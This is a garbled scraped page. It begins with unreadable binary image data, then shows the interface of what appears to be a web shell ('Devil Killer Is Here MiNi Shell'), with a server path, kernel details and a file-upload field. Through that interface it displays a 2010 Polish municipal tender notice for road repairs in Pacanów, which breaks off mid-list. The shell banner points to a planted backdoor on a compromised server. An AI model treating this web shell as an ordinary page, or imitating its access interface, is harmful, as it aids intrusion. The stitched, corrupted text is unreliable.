JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/239682-N-2010.html

<p class="kh_header"><b>Pacanów: Remont dróg gminnych: Nr 361110T Górki-Oblekoń-Smykały, Nr 361023T Kółko Żabieckie-Rataje Karskie k/cmentarza do wału , Nr 361013T Trzebica w kierunku wału o łącznej dł. 7 160 mb</b><br>
<b>Numer ogłoszenia: 239682 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pacanów , ul. Radziwiłłówka 2, 28-133 Pacanów, woj. świętokrzyskie, tel. 041 3765403, faks 041 3765980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pacanow.pl/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg gminnych: Nr 361110T Górki-Oblekoń-Smykały, Nr 361023T Kółko Żabieckie-Rataje Karskie k/cmentarza do wału , Nr 361013T Trzebica w kierunku wału o łącznej dł. 7 160 mb.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Remont dróg gminnych: Nr 361110T Górki-Oblekoń-Smykały, Nr 361023T Kółko Żabieckie-Rataje Karskie k/cmentarza do wału, Nr 361013T Trzebica w kierunku wału o łącznej dł. 7 160 mb
Zakres robót do wykonania:
 1.Remont drogi gminnej Nr 361110T Górki-Oblekoń-Smykały od km 0+000 do km 4+123 dł. 4 123 mb.
Remont polega na wykonaniu:  
a) podbudowy, w tym:
-	podbudowy mieszanką mineralno-asfaltową  w ilości 75kg/ m2 , na odcinku od km 0+000 do km 4+123 w ilości 729,675 ton,
b) Nawierzchni, w tym :
-	nawierzchni z mieszanek mineralno-asfaltowych  stand. II -grubość warstwy po zagęszczeniu  4 cm na odcinku od km 0+000 do km 4+123 w ilości 12 369,00 m2,
c) przepustów w tym:
-	rozbiórka i wykonanie przepustów  O 60  dł. 8,00 mb,
-	rozbiórka i wykonanie przepustów  O 80  dł. 19,00 mb,
-	rozbiórka i wykonanie przepustów  O 50  dł. 7,00 mb,
-	rozbudowa przepustu O 50 na dł. 1,00 mb
d) Rowów w tym:
-	renowacja rowu  z uzupełnieniem poboczy - 5 955,00 mb,
e) Zjazdy ,w tym:
-	wykonanie zjazdów na drogi asfaltowe - 160,50 m2,
f) Robót wykończeniowych ,w tym :
-	wyrównanie poboczy ziemią - 5 652,00 m2,
-	wykonanie barier ochronnych - 24,00 mb  
-	wykonanie zakończeń barier ochronnych - 48,00 mb    
g) Inwentaryzacji geodezyjnej wykonanego zadania


2.Remont  drogi gminnej Nr 361023T Kółko Żabieckie-Rataje Karskie k/cmentarza do wału od km 0+000 do km 1+289 dł 1289 mb i od km 1+820 do km 2+950 dł. 1130 mb 
Remont polega na wykonaniu:  
a) koryta i warstwy odsączającej, w tym:
-	wykonanie koryta koparką o głębokości 20 od km 0+387 do km 0+933,5 w ilości 1366,25 m2 ,
-	wykonanie warstwy odsączającej z piasku o grubości 10 cm  po zagęszczeniu od km 0+387 do km                    0+933,5 w ilości 1 366,25 m2
b) podbudowy, w tym:
-	dolnej warstwy podbudowy z kruszywa łamanego 31,5-63 mm o grubości 15cm po zagęszczeniu , na odcinku od km od km 0+348 do km  0+387 w ilości 14,625 m3,
-	górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm o grubości 5 cm po zagęszczeniu, na     odcinku od km 0+348 do km  0+387 w ilości 97,5 m2,
-	dolnej warstwy podbudowy z kruszywa łamanego 31,5-63 mm o grubości 20 cm po zagęszczeniu , na odcinku od km od km 0+387 do km  0+933,5 w ilości 1366,25 m3,
-	górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm o grubości 5 cm po zagęszczeniu, na     odcinku od km 0+387 do km 0+933,5 w ilości 1366,25 m2,
-	dolnej warstwy podbudowy z kruszywa łamanego 31,5-63 mm o grubości 15 cm po zagęszczeniu, na odcinku od km od km 0+933,5 do km 1+115 w ilości 68,06  m3,
-	górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm o grubości 5 cm po zagęszczeniu ,na odcinku od km 0+933,5 do km 1+115 w ilości 435,75 m2,
-	dolnej warstwy podbudowy z kruszywa łamanego 31,5-63 mm o grubości 10 cm po zagęszczeniu, na odcinku od km  1+115do km 1+289 w ilości 43,5  m3,
-	górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm o grubości 5 cm po zagęszczeniu ,na     odcinku od km 1+115 do km 1+289 w ilości 435,00 m2,
-	uzupełnienie przełomów kruszywem 31,5-63 mm o grubości 10 cm po zagęszczeniu , na odcinku   od km 1+860 do km 2+764 w ilości  2712,00 m2,
c) Nawierzchni, w tym :
-	wyrównanie istniejącej podbudowy mieszanką mineralno-asfaltową  w ilości 75 kg/ m2, na odcinku od km 0+000 do km 0+387 i od km 1+115 do km 1+289 oraz od km 1+820 do km 2+950 w ilości 359,438 ton,
-	nawierzchni z mieszanek mineralno-asfaltowych  stand. II -grubość warstwy po zagęszczeniu 4 cm na odcinku od km 0+000 do km 0+387 i od km 1+115 do km 1+289 oraz od km 1+820 do km 2+950w ilości  4792,50 m2,
d) przepustów, w tym: 
-	remont przepustu O 60 dł. 7,00m
e)  Robót wykończeniowych ,w tym :
-	ścinka poboczy i uzupełnienie  poboczy ziemią w ilości 3 708,00 m2,
-	uzupełnienie poboczy kruszywem 0-31,5 mm na szerokość 0,5m o grubości 15cm od km 0+030 do km 0+167 w ilości 10,28 m3
 f) Inwentaryzacji geodezyjnej wykonanego zadania
 
3.Remont drogi gminnej  Nr 361013T Trzebica w kierunku wału od km 1+965 do km 2+583 dł. 618 mb 
 Remont polega na wykonaniu:  
a) podbudowy, w tym:
-	dolnej warstwy podbudowy z kruszywa łamanego 31,5-63 mm o grubości 10 cm po zagęszczeniu, na odcinku od km od km 2+227 do km  2+230 w ilości 279,00 m2,
-	dolnej warstwy podbudowy z kruszywa łamanego 31,5-63 mm o grubości 15 cm po zagęszczeniu, na odcinku od km od km 2+320 do km  2+517 w ilości 591,00 m2,
-	górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm o grubości 5 cm po zagęszczeniu, na     odcinku od km 2+227 do km 2+517 w ilości 870,00 m2,
-	dolnej warstwy podbudowy z kruszywa łamanego 31,5-63 mm o grubości 10 cm po zagęszczeniu, na odcinku od km od km 2+517 do km  2+583 w ilości 198,00 m2,
-	górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm o grubości 5 cm po zagęszczeniu, na odcinku od km 2+517 do km 2+583 w ilości 198,00 m2,
b) Nawierzchni, w tym :
-	mechaniczne profilowanie masą  mineralno-asfaltową  w ilości 75 kg/ m2 ,na odcinku od km 1+965 do km 2+320 i od km 1+704 do km 1+719 w ilości 81,0 ton,
-	nawierzchni z mieszanek mineralno-asfaltowych  stand. II -grubość warstwy po zagęszczeniu 4cm   na odcinku od km 1+965 o km 2+320  i od km 1+704 do km 1+719 w ilości 1080,00 m2,
c) przepust w tym :
-	remont przepustu O 80 dł. 7,00 mb,
d) przełom w tym :
-	rozebranie nawierzchni i podbudowy na odcinku od km 1+704 do km 1+719 w ilości 15,00 m2,
-	wykonanie podbudowy i nawierzchni z mieszanek mineralno-asfaltowych na odcinku od km 1+704 do km 1+719 w ilości 15,00 m2,
e) Robót wykończeniowych ,w tym :
-	ścinka poboczy i uzupełnienie  poboczy ziemią w ilości 618,00 m2,
-	uzupełnienie  poboczy kruszywem 0-31,5mm szer. 0,5m grubość warstwy 15cm od km 2+134 do km 2+203 w ilości 5,175 m3,
f) Inwentaryzacji geodezyjnej wykonanego zadania

Kod CPV : 
45 000 000-7-  Roboty  budowlane
45 233 140-2 - Roboty drogowe
Zaleca się,  aby wykonawcy  dokonali wizji lokalnej  na terenie realizacji  projektu i w jego  okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.
Zakres rzeczowy przedmiotu zamówienia ma być zgodny  z przedmiarem  robót, a  technologia odpowiadać opisom robót w przedmiarze, dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót. 

Wszelkie prace budowlane lub inne  czynności nie opisane w niniejszym  rozdziale  a niezbędne  do właściwego i  kompletnego  wykonania przedmiotu zamówienia należy uwzględnić  w kalkulacji kosztów między innymi  pomiary geodezyjne i inwentaryzację powykonawczą zadania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające tożsame z zamówieniem głównym, zgodnie z zapisami ustawy PZP</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. Kwota wadium  wynosi  25 000,00 zł.
 Wadium wnosi się  przed upływem terminu składania ofert.
Wadium może być wnoszone  we wszystkich formach określonych w art. 45 PZP
Jeżeli wadium wnoszone będzie w formie gwarancji bankowej/ ubezpieczeniowej to w treści  gwarancji winny znaleźć się następujące elementy:
1) zobowiązanie banku / towarzystwa ubezpieczeniowego do zapłaty sumy wadium przypadku gdy zajdą ku temu ustawowe okoliczności, określone w przepisie art. 46 ust. 5 PZP.,
2) dokładną nazwę postępowania stanowiącego przyczynę wystawienia gwarancji,
3) wskazanie sumy gwarancyjnej,
4) wskazanie Zamawiającego, czyli beneficjenta gwarancji/ ubezpieczonego,
/ tj Gmina Pacanów - Wójt Gminy/,
5) wskazanie Wykonawcy, czyli zleceniodawcy gwarancji / ubezpieczyciela
6) określenie okresu ważności gwarancji tj. wskazanie terminu, w którym zobowiązanie powstaje oraz wygasa, przy czym gwarancja o charakterze terminowym nie może zostać odwołana.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Nadwiślański Bank Spółdzielczy Solec-Zdrój o/ Pacanów 58 85170007 00400400 0172 0020. Kserokopie dowodu wpłaty (polecenie przelewu) należy dołączyć do oferty.
Wadia (oryginały) w formach niepieniężnych należy zdeponować u zamawiającego ( w kasie
Urzędu Gminy w Pacanowie, ul. Radziwiłłówka 2, w dni robocze od godz. 8.00 do 13.00). Do oferty należy dołączyć dowód wniesienia wadium (kserokopie - poświadczoną za zgodność z oryginałem).
W przypadku wadium wniesionego w formie gwarancji, z treści tej gwarancji winno wynikać
bezwarunkowo, że na każde pisemne żądanie zgłoszone przez zamawiającego, w terminie związania ofertą, gwarant zobowiązuje się do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy PzP.
Za zachowanie terminu do wniesienia wadium w przypadku przelewu lub przekazu uważa się uznanie rachunku bankowego Zamawiającego do dnia do dnia 19.08.2010. do godz. 11.00
Zwrot oraz zatrzymanie wadium następuje na zasadach określonych w art. 46 ustawy PZP. Wadium musi być zabezpieczone na okres 30 dni, licząc od daty składania ofert - termin związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku  posiadania uprawnień do wykonywania  określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający nie precyzuje szczegółowych wymagań odnośnie w/w warunku. Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu. 
Ocena spełniania warunków będzie dokonana na podstawie załączonego oświadczenia o spełnieniu warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, zgodnie z wzorem (załącznik nr: 2 di SIWZ), o którym mowa w pkt. 9.1, lit a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku  posiadania wiedzy i doświadczenia Zamawiający wymaga aby Wykonawcy wykazali się doświadczeniem polegającym na wykonaniu minimum 1 roboty budowlanej  polegającą  na ułożeniu  nawierzchni  z mieszanki  mineralno - asfaltowej na drodze o  dł. 2 000,00 mb, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.

Ocena spełniania warunków będzie dokonana na podstawie załączonego oświadczenia o spełnieniu warunku posiadania wiedzy i doświadczeni, zgodnie z wzorem (załącznik nr: 2 do SIWZ), o którym mowa w pkt. 9.1, lit a) SIWZ, a warunków szczegółowych na podstawie:
-	wykazu wykonanych robót przez Wykonawcę zawierającego  min. 1 robotę  budowlaną drogową polegającą  na ułożeniu  nawierzchni  z mieszanki  mineralno- asfaltowej na drodze o  dł. 2 000,00 mb, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania zgodnie ze wzorem (załącznik nr:7) o którym mowa w pkt. 9.1, lit b) SIWZ.
-	dokumentów potwierdzających, że roboty zostały wykonane zgodnie z umową, zasadami sztuki budowlanej i prawidłowo ukończone (referencje)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku  dysponowania odpowiednim potencjałem technicznym , Zamawiający wymaga aby Wykonawcy wykazali się dysponowaniem następującymi maszynami i urządzeniami:
-	Rozściełacz/rozkładarka mas bitumicznych - min. 1 szt.
-	Walce drogowe - min. 2 szt.
-	Koparka - min. 1 szt.
-	Zagęszczarka - min. 1 szt.
-	Samochód ciężarowy- min. 1 szt.
-	Piła do cięcia asfaltu - min. 1 szt
Ocena spełniania warunków będzie dokonana na podstawie załączonego oświadczenia o dysponowania odpowiednim potencjałem technicznym  zgodnie z wzorem (załącznik nr: 2 do SIWZ), o którym mowa w pkt. 9.1, lit a) SIWZ, a warunków szczegółowych na podstawie:   
-	wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, zgodnie ze wzorem (załącznik nr: 6) o którym mowa w pkt. 9.1, lit e) SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający wymaga aby Wykonawcy wykazali się dysponowaniem 1 osobą posiadającą uprawnienia budowlane w specjalności drogowej bez ograniczeń uprawniają do projektowania obiektu budowlanego lub kierowania robotami budowlanymi związanymi z obiektem budowlanym, takim jak droga, w rozumieniu przepisów o drogach publicznych, z wyłączeniem drogowych obiektów inżynierskich oprócz przepustówi.
Ocena spełniania warunków będzie dokonana na podstawie załączonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania zamówienia, zgodnie z wzorem (załącznik nr: 2 do SIWZ), o którym mowa w pkt. 9.1, lit a) SIWZ, a warunków szczegółowych na podstawie:
-	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami, zgodnie ze wzorem (załącznik nr:4) o którym mowa w pkt. 9.1, lit c) SIWZ.
-	Oświadczenia, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, zgodnie ze wzorem (załącznik nr: 5) o którym mowa w pkt. 9.1, lit d) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku  znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający wymaga aby Wykonawcy wykazali się posiadaniem środków finansowych lub zdolności kredytowej w wysokości  minimum 1 000 000,00 zł.
Ocena spełniania warunków będzie dokonana na podstawie załączonego oświadczenia o znajdowaniu się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia zgodnie z wzorem (załącznik nr: 2 do SIWZ), o którym mowa w pkt. 9.1, lit a) SIWZ, a warunków szczegółowych na podstawie:
-	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej posiadanie minimum 1 000 000,00 zł środków finansowych lub zdolność kredytową wykonawcy w tej samej wysokości, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

